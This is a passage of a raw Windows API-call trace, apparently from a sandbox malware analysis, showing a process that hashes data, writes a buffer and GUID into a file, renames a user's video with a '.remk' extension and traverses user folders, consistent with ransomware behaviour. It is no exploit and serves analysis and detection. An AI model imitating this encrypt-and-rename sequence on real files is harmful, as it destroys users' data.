hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.007] GetLastError () returned 0x0 [0233.007] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.007] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0233.007] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.007] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.007] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.008] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.008] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.008] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0233.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2e0 | out: hHeap=0x630000) returned 1 [0233.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2f8 | out: hHeap=0x630000) returned 1 [0233.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee340 | out: hHeap=0x630000) returned 1 [0233.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0233.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0233.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee340 [0233.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0233.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee2f8 [0233.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0233.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee2e0 [0233.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0233.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31a4298 [0233.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0233.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0233.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0233.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0233.009] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0233.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2f8 | out: hHeap=0x630000) returned 1 [0233.009] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0233.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2e0 | out: hHeap=0x630000) returned 1 [0233.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0233.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee340 | out: hHeap=0x630000) returned 1 [0233.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0233.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0233.010] GetCurrentThreadId () returned 0x314 [0233.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0233.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b96b0 [0233.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0233.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0233.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3192918 [0233.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0233.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0233.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.010] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.010] GetCurrentThreadId () returned 0x314 [0233.010] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0233.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0233.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0233.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0233.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0233.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0233.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0233.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0233.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee340 [0233.011] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0233.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0233.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0233.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0233.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0233.011] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0233.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2e0 [0233.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0233.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0233.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0233.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0233.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0233.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2f8 [0233.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0233.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0233.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0233.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2c8 [0233.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0233.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee358 [0233.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0233.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0233.012] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee328 [0233.012] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee310 [0233.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee370 [0233.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee310 | out: hHeap=0x630000) returned 1 [0233.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee310 [0233.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee328 | out: hHeap=0x630000) returned 1 [0233.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0233.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0233.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0233.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0233.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0233.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2e0 | out: hHeap=0x630000) returned 1 [0233.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2e0 [0233.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0233.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325d6d0 [0233.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee340 | out: hHeap=0x630000) returned 1 [0233.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0233.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee370 | out: hHeap=0x630000) returned 1 [0233.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d8e0 [0233.013] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0233.013] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0233.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0233.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0233.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2e0 | out: hHeap=0x630000) returned 1 [0233.014] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325daf8 [0233.014] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0233.015] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x17b4d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.015] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.015] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.015] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.015] CloseHandle (hObject=0x640) returned 1 [0233.018] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8RYL8Xv3gwr89piN.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8ryl8xv3gwr89pin.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\8RYL8Xv3gwr89piN.flv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\8ryl8xv3gwr89pin.flv.remk")) returned 1 [0233.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.019] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0233.021] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0233.021] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned=".ini" [0233.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693330 | out: hHeap=0x630000) returned 1 [0233.021] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37f59a00, ftCreationTime.dwHighDateTime=0x1d5e65c, ftLastAccessTime.dwLowDateTime=0x42b5a5c0, ftLastAccessTime.dwHighDateTime=0x1d5e576, ftLastWriteTime.dwLowDateTime=0x42b5a5c0, ftLastWriteTime.dwHighDateTime=0x1d5e576, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="g1CuCps yZIAOwjCa", cAlternateFileName="G1CUCP~1")) returned 1 [0233.021] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88546410, ftCreationTime.dwHighDateTime=0x1d5e146, ftLastAccessTime.dwLowDateTime=0x7f6b8a00, ftLastAccessTime.dwHighDateTime=0x1d5dc31, ftLastWriteTime.dwLowDateTime=0x7f6b8a00, ftLastWriteTime.dwHighDateTime=0x1d5dc31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PCPKs0u", cAlternateFileName="")) returned 1 [0233.021] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88546410, ftCreationTime.dwHighDateTime=0x1d5e146, ftLastAccessTime.dwLowDateTime=0x7f6b8a00, ftLastAccessTime.dwHighDateTime=0x1d5dc31, ftLastWriteTime.dwLowDateTime=0x7f6b8a00, ftLastWriteTime.dwHighDateTime=0x1d5dc31, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PCPKs0u", cAlternateFileName="")) returned 0 [0233.021] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5498 | out: hHeap=0x630000) returned 1 [0233.022] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b57b0 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325de78 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5860 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b58b8 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5288 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325de10 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e080 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e0e8 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b53e8 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e150 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5700 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e1b8 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b56a8 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5650 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e220 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b55f8 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b55a0 | out: hHeap=0x630000) returned 1 [0233.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b51d8 | out: hHeap=0x630000) returned 1 [0233.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0233.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0233.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b8 | out: hHeap=0x630000) returned 1 [0233.023] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0233.023] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0233.023] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0233.023] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0233.023] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0233.023] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0233.023] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0233.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.023] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0233.023] PathFindFileNameW (pszPath="") returned="" [0233.023] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0233.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba510 | out: hHeap=0x630000) returned 1 [0233.024] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0233.024] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0233.024] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0233.024] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0233.024] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0233.024] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0233.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0233.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0233.024] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0233.024] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0233.024] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0233.024] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0233.025] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\") returned="0wlw97NT\\" [0233.025] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0233.025] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0233.025] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0233.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0233.025] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0233.025] PathFindFileNameW (pszPath="") returned="" [0233.025] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0wlw97NT\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56ecaea0, ftCreationTime.dwHighDateTime=0x1d5e08d, ftLastAccessTime.dwLowDateTime=0xd544e6c0, ftLastAccessTime.dwHighDateTime=0x1d5e130, ftLastWriteTime.dwLowDateTime=0xd544e6c0, ftLastWriteTime.dwHighDateTime=0x1d5e130, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, 